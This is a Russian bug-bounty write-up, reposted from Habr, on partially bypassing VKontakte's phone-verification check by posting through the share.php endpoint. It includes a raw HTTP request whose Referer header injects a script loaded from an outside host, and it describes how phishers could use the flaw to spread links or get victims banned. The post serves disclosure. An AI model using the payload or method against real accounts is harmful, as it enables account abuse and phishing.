- PVSM.RU - https://www.pvsm.ru -

[BugBounty] Частичный обход аутентификации vk.com

Поставил перед собой задачу — обойти аутентификацию Вконтакте. Когда ip адрес человека, который входит на аккаунт vk меняется, нужно ввести полный номер телефона. Если злоумышленник входил через телефон; пароль, то он сможет совершать действия на аккаунте. Но если он входил через email; пароль или через подмену cookies, то он не сможет совершать какие либо действия на аккаунте.

image Вся информация предоставлена исключительно в ознакомительных целях. Я не несу ответственности за любой возможный вред, причиненный материалами этой статьи.


Брутфорсинг здесь работать не будет, так как у нас всего 3 попытки ввести номер телефона. Пытался выполнять все возможные get и post запросы, но все время происходил редирект на https://vk.com/login.php?act=security_check [1].

image

Можно было бы выполнить post запрос из другого аккаунта, для этого нам нужен csrf token(hash), но я смог найти только токен для логаута https://login.vk.com/?act=logout&hash=dbefb8b0bba973b95e&reason=tn&_origin=https://vk.com [2].

Нам предлагают изменить номер телефона на аккаунте vk.com/restore?act=change_phone [3], здесь можем видеть количество непрочитанных сообщений (не баг, а фича, но убрать это не мешало бы) и настройки пунктов меню.

Чуть позже, случайно я наткнулся на функционал шаринга ссылки https://vk.com/share.php?url=https://ok.ru [4], на мое удивление, эта ссылка открылась:

image

Попытался запостить себе ссылку на стенку и получил сообщение.

Поздравляем! Ссылка появится на Вашей странице.

image

Сначала не поверил, подумал, что security_check заблокировал всё, но зашел на стенку и увидел, что ссылка успешно запостилась )

На стену можно расшаривать не только ссылки, а и обычный пост, для этого нужно оставить параметр url пустым https://vk.com/share.php?url= [5].

image

Также, если мы владелец или администратор сообщества, мы можем запостить на стену сообщества запись в обход ввода номера телефона.

Друзьям мы не можем отправить сообщение, так как vk.com/login.php?act=security_check [1] блокирует получение списка друзей. Запрос отправки url другу имеет вид.

POST /al_mail.php HTTP/1.1
Host: vk.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://vk.com/share.php?url="><script src=https://securityz.net/t.js?320408></script></script>
Content-Length: 139
Cookie: remixlang=0
Connection: close

act=a_send&al=1&chas=89c444076031dff154&from=share&media=share%3A0_0&message=ww&share_desc=&share_title=&share_url=&title=&to_ids=204690***

Где to_ids — иды друзей, chas — csrf токен, значит, мы не можем просто подставить ид друга, токен нам мешает. С запроса шаринга ссылки на стену токен мы взять не можем, так там совсем другая переменная — hash=bb6e1ce8db5f1419e3.

Сразу после обнаружения уязвимости я написал репорт на h1 [6], мне сказали, что это дубликат, ранее уже присылали такой репорт.

Чтобы узнать примерную дату, когда прислали репорт, я обращаюсь к поиску по репортам [7], смотрю репорт, ид которого наиболее близок к моему и смотрю дату — hackerone.com/reports/170894 [8]. Оказалось, репорт этот прислали 4 месяца назад.

Очень печально, что vk за это время не смогли исправить уязвимость. Некоторые репорты висят годами, уверен, что много баг хантеров в bug bounty vk наткнулись на дубликаты, так как ни для кого не секрет, что у ВК много репортов и много работы, а безопасников очень мало.

Пруф — уязвимость в видео файлах, которую прислал Алексей Писаренко [9]. Ожидает устранения уже 2 года!!

image

Ещё один репорт, который висит уже 1 год:

image

Эта статья создана только для того, чтобы привлечь внимание разработчиков Вконтакте, надеюсь, они исправят данную уязвимость, увеличат штат безопасников и начнут оперативно устранять уязвимости.

Выводы: Цель фишеров — спамить, она остается выполнимой, аутентификацию можно забайпасить.

P.S: В процессе обхода аутентификации обнаружил уязвимость, которая позволяет подписаться на любую групу vk, не зная номера телефона жертвы, и ещё одну, с помощью которой можно полностью обойти ввод номера, но пока об этом не написал репорт.

image

P.P.S: Об импакте уязвимости:

1. Эта уязвимость может использоваться при массовых фишинговых атаках на пользователей (сейчас набирает популярность создание фейков ВК и распостранение их через личные сообщения, а также соц инженерия, применимая на друзьях взломанных аккаунтов), часто фишеры при получении логов сталкиваются с проблемой входа в аккаунт и дальнейшего распостранения url фишингового сайта (получают только email;password), с этой уязвимостью они могут получать намного больше логов за счет того, что делятся своей ссылкой на стене и в группе жертвы.

2. Чтобы заблокировать или заморозить страницу пользователя — нужно поделится запрещенной ссылкой у себя на стене и аккаунт сразу заблокируют.

Группа VK и мой твиттер внизу. Подписывайтесь :)

Автор: w9w

Источник [10]


Сайт-источник PVSM.RU: https://www.pvsm.ru

Путь до страницы источника: https://www.pvsm.ru/vkontakte/237745

Ссылки в тексте:

[1] https://vk.com/login.php?act=security_check: https://vk.com/login.php?act=security_check

[2] https://login.vk.com/?act=logout&hash=dbefb8b0bba973b95e&reason=tn&_origin=https://vk.com: https://login.vk.com/?act=logout&hash=dbefb8b0bba973b95e&reason=tn&_origin=https://vk.com

[3] vk.com/restore?act=change_phone: https://vk.com/restore?act=change_phone

[4] https://vk.com/share.php?url=https://ok.ru: https://vk.com/share.php?url=https://ok.ru

[5] https://vk.com/share.php?url=: https://vk.com/share.php?url=

[6] h1: https://hackerone.com/vkcom

[7] поиску по репортам: https://hackerone.com/hacktivity?sort_type=popular&filter=type%3Aall&page=3

[8] hackerone.com/reports/170894: https://hackerone.com/reports/170894

[9] Алексей Писаренко: https://hackerone.com/pisarenko

[10] Источник: https://habrahabr.ru/post/320408/?utm_source=habrahabr&utm_medium=rss&utm_campaign=best